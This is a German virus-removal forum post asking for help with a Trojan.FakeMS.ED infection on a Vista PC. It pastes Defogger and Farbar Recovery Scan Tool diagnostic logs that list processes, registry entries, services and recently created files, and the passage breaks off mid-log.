| |
| |||||||
Log-Analyse und Auswertung: Trojan.FakeMS.ED in dll-DateiWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML |
 |
06.12.2014, 10:40
| #1 |
| |  Trojan.FakeMS.ED in dll-Datei Schönen guten Morgen zusammen, ich habe momentan den Rechner meines Kollegen zuhause, da er von frustrierenden Instabilitäten des OS (u.a. explorer.exe funktioniert nicht mehr) und extremen Geschwindigkeitsproblemen berichtet hat. Das kann ich so bestätigen, es ist fast unerträglich mit diesem Rechner ein Programm zu öffnen o.ä. Nachdem ich zuerst dachte, dass es mit einem Durchlauf mit MBAM zu beheben wäre, suche ich jetzt doch bei euch Rat, da die Infizierung des Rechners wohl weitläufiger ist, als angenommen. Gefunden wurde der im Threadtitel erwähnte Trojaner Trojan.FakeMS.ED in einer DLL-Datei in c:\program data\...anbei erstmal alle Logs der bisher durchgeführten Scans. Defogger: Code:
ATTFilter defogger_disable by jpshortstuff (23.02.10.1)
Log created at 09:18 on 06/12/2014 (finja)
Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.
Checking for services/drivers...
-=E.O.F=-
Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 03-12-2014 Ran by finja (administrator) on FINJA-PC on 06-12-2014 09:20:56 Running from C:\Users\finja\Desktop Loaded Profile: finja (Available profiles: finja) Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: Deutsch (Deutschland) Internet Explorer Version 9 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (Microsoft Corporation) C:\Windows\System32\SLsvc.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe (InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe (Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE (Intel Corporation) C:\Windows\System32\igfxsrvc.exe (Microsoft Corporation) C:\Windows\System32\mobsync.exe (Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe (Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation) C:\Windows\ehome\ehtray.exe (1und1 Mail und Media GmbH) C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe (Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe (Microsoft Corporation) C:\Windows\ehome\ehmsas.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe (Intel Corporation) C:\Windows\System32\igfxext.exe (Microsoft Corporation) C:\Windows\System32\conime.exe (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbam.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Corporation) HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [768520 2008-07-25] (Dritek System Inc.) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [159744 2007-07-21] (Alps Electric Co., Ltd.) HKLM\...\Run: [WarReg_PopUp] => C:\Program Files\eMachines\WR_PopUp\WarReg_PopUp.exe [49152 2008-05-09] (eMachines) HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation) HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation) HKLM\...\Run: [eRecoveryService] => [X] HKLM\...\Run: [MailCheck IE Broker] => C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe [2135104 2014-11-17] (1und1 Mail und Media GmbH) HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0 HKLM\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Corporation) HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [TaskbarNoNotification] 0 HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a GroupPolicy: Group Policy on Chrome detected <======= ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION ProxyServer: [.DEFAULT] => http=127.0.0.1:53278;https=127.0.0.1:53278 HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://suche.web.de/webhp?src=br_startpage_ie StartMenuInternet: IEXPLORE.EXE - iexplore.exe SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = SearchScopes: HKLM -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW SearchScopes: HKU\.DEFAULT -> {31BB071C-45F4-4DAD-BF5E-AD495B3B2FC8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> DefaultScope {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation) BHO: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH) Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {FA23121F-EE7C-4BD8-8C06-123D087282C5} - No File Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {F2413FFA-9DCC-48B3-A09A-625F44D7FA96} - No File DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation) Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation) Handler: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH) Tcpip\Parameters: [DhcpNameServer] 192.168.179.1 FireFox: ======== FF ProfilePath: C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default FF NetworkProxy: "http", "127.0.0.1" FF NetworkProxy: "http_port", 38159 FF NetworkProxy: "no_proxies_on", "localho,t,127.0.0.1,*origin.com,*ea.com,*akamaihd.net" FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.) FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\webssearches.xml FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [2014-11-11] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [2014-11-04] FF Extension: 06997db0c0274d5fbd37b0d9230226ea - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea} [2014-11-06] FF Extension: Microsoft .NET Framework Assistant - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2014-11-04] FF Extension: PriceFountain - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{b6a94784-0ffb-4121-88c6-435139067ee2}.xpi [2014-11-06] FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-16] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found] FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found] FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found] FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found] FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found] FF Extension: No Name - tylerkeith11@aol.com [Not Found] FF StartMenuInternet: FIREFOX.EXE - firefox.exe Chrome: ======= CHR StartMenuInternet: Google Chrome - chrome.exe ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed] R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2007-01-17] (Hewlett-Packard Company) [File not signed] R2 MBAMScheduler; C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation) R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation) S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed] R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation) S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed] S2 compilerehtraceProt.exe; C:\Users\finja\AppData\Local\compilerehtraceProt\compilerehtraceProt.exe [X] S2 evrtspkgBckp.exe; C:\Users\finja\AppData\Local\evrtspkgBckp\evrtspkgBckp.exe [X] S2 FrozenGNUThumbnail.exe; C:\Users\finja\AppData\Local\FrozenGNUThumbnail\FrozenGNUThumbnail.exe [X] S2 FrozenSambaWindows.exe; C:\Users\finja\AppData\Local\FrozenSambaWindows\FrozenSambaWindows.exe [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R1 DritekPortIO; C:\Program Files\Launch Manager\DPortIO.sys [20112 2006-11-02] (Dritek System Inc.) S3 grmnusb; C:\Windows\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.) S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [35992 2014-12-05] () R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-12-06] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation) R1 MpKsl5421b1e8; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{DB19E517-5918-4579-8B90-D6C1402891F0}\MpKsl5421b1e8.sys [39464 2014-12-05] (Microsoft Corporation) S3 USB_RNDIS; C:\Windows\System32\DRIVERS\usb8023.sys [15872 2013-02-12] (Microsoft Corporation) S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X] S3 IntcAzAudAddService; system32\drivers\RTKVHDA.sys [X] S3 IpInIp; system32\DRIVERS\ipinip.sys [X] S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X] S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-06 09:20 - 2014-12-06 09:21 - 00015414 _____ () C:\Users\finja\Desktop\FRST.txt 2014-12-06 09:20 - 2014-12-06 09:21 - 00000000 ____D () C:\FRST 2014-12-06 09:19 - 2014-12-06 09:19 - 01110016 _____ (Farbar) C:\Users\finja\Desktop\FRST.exe 2014-12-06 09:18 - 2014-12-06 09:18 - 00000472 _____ () C:\Users\finja\Desktop\defogger_disable.log 2014-12-06 09:18 - 2014-12-06 09:18 - 00000000 _____ () C:\Users\finja\defogger_reenable 2014-12-06 09:17 - 2014-12-06 09:17 - 00050477 _____ () C:\Users\finja\Desktop\Defogger.exe 2014-12-06 08:40 - 2014-12-06 08:50 - 00003570 _____ () C:\Users\finja\Desktop\Rkill.txt 2014-12-06 08:39 - 2014-12-06 08:39 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\finja\Downloads\rkill.exe 2014-12-05 21:51 - 2014-12-06 08:53 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-12-05 21:51 - 2014-12-05 21:53 - 00000901 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\Program Files\ Malwarebytes Anti-Malware 2014-12-05 21:50 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-12-05 21:50 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-12-05 21:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-12-05 21:07 - 2014-12-05 21:07 - 00000055 _____ () C:\AdwCleanerDebug.txt 2014-12-05 21:04 - 2014-12-05 21:04 - 00000000 ____D () C:\TDSSKiller_Quarantine 2014-12-05 20:49 - 2014-12-05 20:49 - 00035992 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys 2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader 2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI 2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32 2014-12-05 19:40 - 2014-12-05 19:40 - 263670483 _____ () C:\Windows\MEMORY.DMP 2014-12-05 19:40 - 2014-12-05 19:40 - 00145784 _____ () C:\Windows\Minidump\Mini120514-01.dmp 2014-12-05 19:39 - 2014-12-05 19:39 - 00000000 ____D () C:\Temp 2014-12-05 13:33 - 2014-12-05 20:08 - 00000000 ____D () C:\ProgramData\HitmanPro 2014-12-04 20:43 - 2014-12-04 20:43 - 00000000 ____D () C:\Users\finja\AppData\Local\Microsoft Corporation 2014-12-03 19:45 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\ZorkoKcesd 2014-12-02 19:37 - 2014-12-02 19:37 - 00000000 ____D () C:\Windows\system32\utilitylocalspl_86 2014-12-02 19:34 - 2014-12-02 19:34 - 00000000 ____D () C:\Windows\system32\scrollingwin32Prot 2014-12-01 11:06 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\EedtaWbezm 2014-12-01 11:06 - 2014-12-05 21:45 - 00000000 ___HD () C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A} 2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WEB.DE MailCheck 2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\Program Files\WEB.DE MailCheck 2014-11-28 20:51 - 2014-11-28 20:51 - 00000000 ____D () C:\ProgramData\UUdb 2014-11-27 22:42 - 2014-11-27 22:42 - 00000000 ____D () C:\Program Files\Microsoft ATS 2014-11-27 22:33 - 2014-11-27 22:33 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall (1).exe 2014-11-27 22:31 - 2014-11-27 22:31 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall.exe 2014-11-27 22:23 - 2014-11-27 22:23 - 00001998 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 Upgrade Advisor.lnk 2014-11-27 22:23 - 2014-11-27 22:23 - 00001986 _____ () C:\Users\Public\Desktop\Windows 7 Upgrade Advisor.lnk 2014-11-27 22:23 - 2014-11-27 22:23 - 00000000 ____D () C:\Program Files\Microsoft Windows 7 Upgrade Advisor 2014-11-27 21:25 - 2014-11-27 21:25 - 00000000 ____D () C:\Windows\system32\DesktopMBRText 2014-11-25 15:33 - 2014-12-05 20:32 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-11-19 21:31 - 2014-10-24 02:03 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2014-11-13 14:27 - 2014-11-13 14:27 - 00000951 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2014-11-13 13:30 - 2014-11-13 13:30 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-11-13 13:25 - 2014-11-13 13:25 - 00000000 ____D () C:\Windows\ERUNT 2014-11-13 13:15 - 2014-12-05 21:09 - 00000000 ____D () C:\AdwCleaner 2014-11-13 12:54 - 2014-12-05 13:56 - 00001356 _____ () C:\Users\finja\AppData\Local\d3d9caps.dat 2014-11-12 23:01 - 2014-10-10 02:01 - 00449536 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2014-11-12 23:01 - 2014-10-10 02:00 - 01259008 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2014-11-12 23:01 - 2014-10-10 02:00 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2014-11-12 23:01 - 2014-10-10 00:22 - 00619520 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2014-11-12 22:59 - 2014-09-19 01:50 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2014-11-12 22:59 - 2014-08-27 01:55 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2014-11-12 22:59 - 2014-08-27 01:55 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll 2014-11-12 22:56 - 2014-08-12 03:25 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL 2014-11-12 22:53 - 2014-10-18 02:08 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2014-11-12 22:53 - 2014-10-03 02:18 - 00274432 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00170496 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll 2014-11-12 07:47 - 2014-10-24 02:04 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 2014-11-12 07:45 - 2014-10-13 00:34 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-11-11 22:20 - 2014-10-27 20:10 - 12366848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-11-11 22:20 - 2014-10-27 20:05 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-11-11 22:20 - 2014-10-27 20:02 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-11-11 22:20 - 2014-10-27 19:59 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-11-11 22:20 - 2014-10-27 19:59 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-11-11 22:20 - 2014-10-27 19:58 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-11-11 22:20 - 2014-10-27 19:57 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2014-11-11 22:20 - 2014-10-27 19:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-11-11 22:20 - 2014-10-27 19:55 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-11-11 22:20 - 2014-10-27 19:55 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2014-11-11 22:20 - 2014-10-27 19:55 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2014-11-11 22:20 - 2014-10-27 19:54 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-11-11 08:42 - 2014-11-11 08:42 - 00000000 ____D () C:\Users\finja\AppData\Roaming\AdvancedSystemProtector 2014-11-11 08:40 - 2014-12-06 08:46 - 00001340 _____ () C:\Windows\Tasks\XPGILDE.job 2014-11-11 08:39 - 2014-12-06 08:43 - 00001684 _____ () C:\Windows\Tasks\MQZDOUD.job 2014-11-11 08:33 - 2014-11-11 08:36 - 01057112 _____ (Installer Setup ) C:\Users\finja\Downloads\installer_java_German.exe 2014-11-10 21:27 - 2014-12-05 19:40 - 00000000 ____D () C:\Windows\Minidump 2014-11-08 21:59 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7 2014-11-06 21:02 - 2014-11-06 21:02 - 00000000 ____D () C:\Users\finja\AppData\Local\Macromedia 2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess 2014-11-06 20:30 - 2014-11-06 20:30 - 00000003 _____ () C:\Users\finja\Downloads\C ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-06 09:18 - 2009-05-16 15:26 - 00000000 ____D () C:\Users\finja 2014-12-06 08:56 - 2009-02-27 09:31 - 01196410 _____ () C:\Windows\WindowsUpdate.log 2014-12-05 22:17 - 2014-10-28 11:28 - 00000000 ____D () C:\ProgramData\83b32e09-56dd-4d15-bbc7-350e8627ec65 2014-12-05 21:41 - 2009-02-27 10:20 - 00000000 _____ () C:\Windows\system32\LogConfigTemp.xml 2014-12-05 21:41 - 2006-11-02 14:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-12-05 21:41 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 2014-12-05 21:41 - 2006-11-02 13:47 - 00003216 ____H () 